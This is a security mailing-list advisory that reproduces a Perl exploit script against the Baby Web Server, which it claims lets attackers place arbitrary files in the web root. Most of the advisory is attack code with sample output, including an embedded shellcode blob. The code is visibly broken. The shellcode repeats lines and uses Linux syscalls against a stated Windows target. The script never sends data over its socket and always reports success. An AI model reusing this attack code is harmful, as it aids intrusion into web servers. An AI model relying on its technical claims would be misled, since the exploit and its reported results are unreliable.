[EXPL] Baby Web Server Command Validation (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Baby Web Server Command Validation (Exploit)
------------------------------------------------------------------------

SUMMARY

"The main goal of <http://www.pablosoftwaresolutions.com/> Baby Web
Server was to design a simple web server with support for ASP."

By sending an especially crafted request to Baby Web Server, attackers
can place any file type into web root of the web server.

DETAILS

Exploit:
#!/bin/perl
#
# Baby Web Server Command Validation Exploit
# --------------------------------------------------
# Infam0us Gr0up - Securiti Research
#
#
# E:\>nc -v localhost 80
# Infam0us-Gr0up [127.0.0.1] 80 (http) open
# GET HTTP
#
# HTTP/1.0 400 Bad Request
# Server: Baby Web Server < --
# Set-Cookie: SESSIONID=00000001; path=/;version=1
# Last-Modified: Tue, 12 Jul 2005 06:43:05 GMT
#
#
# E:\PERL>perl babyws.pl localhost test.txt E:\Website\www04\ad\index.html
#
# [+] Connecting to localhost..
# [+] Connected
# [+] Create Spl0it..
# [+] Sending Command Validation..
# [+] Now attacking..
# [+] Domain: localhost
# [+] Path:E: E:\Website\www04\ad\index.html
# [+] 0wned!
#
# Tested on Windows2000 SP4 (Win NT)
# Info : basher13 at linuxmail.org / infamous.2hell.com
#

use IO::Socket;
if(@ARGV!=3){
print " Baby Web Server Command Validation Exploit \n";
print "----------------------------------------------------\n";
print " Infam0us Gr0up - Securiti Research\n\n";
print "[-]Usage: babyws.pl [target] [input] [path_file]\n";
print "[?]Exam: babyws.pl localhost test.txt
e:\www\site01\default.htm\n\n";
exit(1);
}

$site = $ARGV[0];

my $infile = $ARGV[1];
my $path = $ARGV[2];

print "\n\n";
print "[+] Connecting to $site..\n";

$sock = IO::Socket::INET->new(
PeerAddr => "$ARGV[0]",
PeerPort => 80,
Proto => "tcp")
or die "Unable to connect";

print "[+] Connected\n";
print "[+] Create Spl0it..\n";

$sploit =
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10".
"\x40\x89\xc3\x89\x46\x0c\x40\x89".
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd".
"\x40\x89\xc3\x89\x46\x0c\x40\x89".
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd".
"\x80\x43\xc6\x46\x10\x10\x88\x46".
"\x08\x31\xc0\x31\xd2\x89\x46\x18".
"\xb0\x90\x66\x89\x46\x16\x8d\x4e".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x66\xcd\x80\x89\x5e\x0c\x43\x43".
"\xb0\x66\xcd\x80\x89\x56\x0c\x89".
"\x08\x31\xc0\x31\xd2\x89\x46\x18".
"\xb0\x90\x66\x89\x46\x16\x8d\x4e".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x56\x10\xb0\x66\x43\xcd\x80\x86".
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x66\xcd\x80\x89\x5e\x0c\x43\x43".
"\xb0\x66\xcd\x80\x89\x56\x0c\x89".
"\x56\x10\xb0\x66\x43\xcd\x80\x86".
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0".
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd".
"\x80\x88\x56\x07\x89\x76\x0c\x87".
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80".
"\xe8\x8d\xff\xff";

print "[+] Sending Command Validation..\n";
open(OUT, ">$path") or die("unable to open $path: $!");
open(IN, $infile) or die("unable to open $infile: $!");
@directories=<IN>;

$blah = "GET $sploit HTTP/1.0\nHost: $site\nContent-length: 4\nTEST\n";

print "[+] Now attacking..\n";

foreach (@directories) {
chomp;
print OUT "$_ --> ";
s/ /%20/g;
my $repl = (qq(PUT /$_/test.txt $blah));

if ($repl =~ /not allowed/i) { print OUT "Not Allowed\n"; }
elsif ($repl =~ /403.4 Forbidden: SSL required/i) { print OUT "*
403.4 Forbidden: SSL required *\n"; }
elsif ($repl =~ /401 Unauthorized/i) { print OUT "401
Unauthorized\n"; }
elsif ($repl =~ /Error 404/i) { print OUT "Error 404\n"; }
elsif ($repl =~ /Write Access Forbidden/i) { print OUT "Write
Access Forbidden\n"; }
elsif ($repl =~ /Unauthorized due to ACL on resource/i) { print
OUT "Unauthorized due to ACL on resource\n"; }
else { print OUT "*** SUCCESSFULL PUT ***\n"; }
}
close($sock);
print "[+] Domain: $site\n";
print "[+] Path: $ARGV[2]\n";
print "[+] 0wned!\n";
exit();

#EoF

ADDITIONAL INFORMATION

The information has been provided by <mailto:basher13@linuxmail.org> eric
basher.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.